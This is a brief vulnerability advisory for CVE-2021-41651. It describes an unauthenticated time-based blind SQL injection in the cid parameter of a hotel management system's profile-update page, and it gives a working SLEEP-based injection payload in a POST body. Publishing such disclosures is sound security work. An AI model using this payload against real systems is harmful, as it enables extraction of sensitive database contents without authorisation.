CVE-2021-41651 SQL Injection in hotel-mgmt-system
The hotel-mgmt-system is vulnerable to un-authenticated time based blind SQL Injection attack.
The cid parameter on the /process_update_profile.php page does not sanitize the user input, an attacker can extract sensisitive data from the underlying MySQL Database.
URL: /process_update_profile.php
PARAMETER: cid
Parameter: cid ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: phone=123456778&cid=14 AND (SELECT 9048 FROM (SELECT(SLEEP(5)))zCfD)-- IKdVf&submitBtn=Update&fullName=James&email=me@you.com&newPassword=fasdfasdfasdfasdfasdf-
Jason Colyvas
MOBIUSBINARY
September 23rd, 2021